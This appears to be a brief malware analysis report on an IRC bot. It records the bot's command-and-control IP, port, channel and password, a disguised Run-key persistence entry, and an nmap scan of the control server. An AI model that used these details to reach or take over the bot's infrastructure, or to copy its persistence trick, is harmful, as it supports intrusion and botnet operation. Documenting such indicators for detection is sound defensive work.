Remote Host Port Number
61.139.151.20 6697
MODE MetroP-XP820
JOIN #putas
PONG bitches.teibol.com
NICK MetroP-XP820
USER USA63600 * 0 :COMPUTERNAME
PASS msnfuck
Other details
* The following port was open in the system:
Port Protocol Process
1052 TCP iexplore.exe (%System%iexplore.exe)
Registry Modifications
* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Windows Internet Explorer = “iexplore.exe”
so that iexplore.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name Process Filename Main Module Size
iexplore.exe %System%iexplore.exe 319 488 bytes
Interesting ports on 61.139.151.20:
Not shown: 1668 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp PureFTPd
22/tcp open ssh OpenSSH 4.1 (protocol 1.99)
23/tcp open telnet Linux telnetd
80/tcp open http Apache Tomcat/Coyote JSP engine 1.1
111/tcp open rpc
389/tcp open ldap OpenLDAP 2.2.X
427/tcp open svrloc?
513/tcp open login?
631/tcp open tcpwrapped
873/tcp open rsync (protocol version 29)
6667/tcp open irc Unreal ircd
7001/tcp open irc Unreal ircd
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.5 – 2.6.11
Uptime 34.950 days (since Thu Sep 24 15:34:39 2009)
TCP Sequence Prediction: Class=random positive increments
Difficulty=2975685 (Good luck!)